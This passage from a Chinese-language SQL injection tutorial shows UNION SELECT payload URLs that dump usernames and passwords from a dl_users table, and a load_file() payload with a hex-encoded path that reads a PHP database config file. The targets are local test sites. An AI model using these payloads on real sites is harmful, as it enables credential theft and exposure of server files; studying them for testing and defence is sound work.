三:一些注入技巧,很多都是個人發現哦
1.union select的技巧
UNION 用於將多個 SELECT 語句的結果聯合到一個結果集中。在 SELECT 中的 select_expression 部分列出的列必須具有同樣的類型。第一個 SELECT 查詢中使用的列名將作為結果集的列名返回。
然而有我們可以用下面的方法來猜測列的類型,可是省去很多時間
我們先
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
圖24
看看軟件描述裡寫著3,作者裡寫著4,我們就可以猜測3和4的位置是字符型的,我們再看14前面的是下載次數,這就應該是int型的了,對吧。
好了,我們根據這裡來構建吧,估計username和password也是字符型的。
試試看哦
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
如圖25
哈哈,這種方法只要看看就可以大概猜到了。
2.load_file讀寫文件的技巧
不知道你有沒有發現過在我們用load_file()讀寫php文件時不能在網頁中顯示。例如:
C:/apache/htdocs/site/lib/sql.inc.php 轉化為16進制為:0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870
我們構造如下
http://localhost/site/display.php?id=
451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870)
,4,5,6,7,8,9,10,11
如圖26
發現在文章內容的地方本來該顯示sql.inc.php的,可是卻空空之,為何呢?
我們看看網頁的源代碼先
圖27
哈哈,看看標記的地方,暈死,原來在這裡啊,可是為什麼哩?
原來html中< >用於標注,哈哈,明白了吧!下次可得記得在哪裡找哦。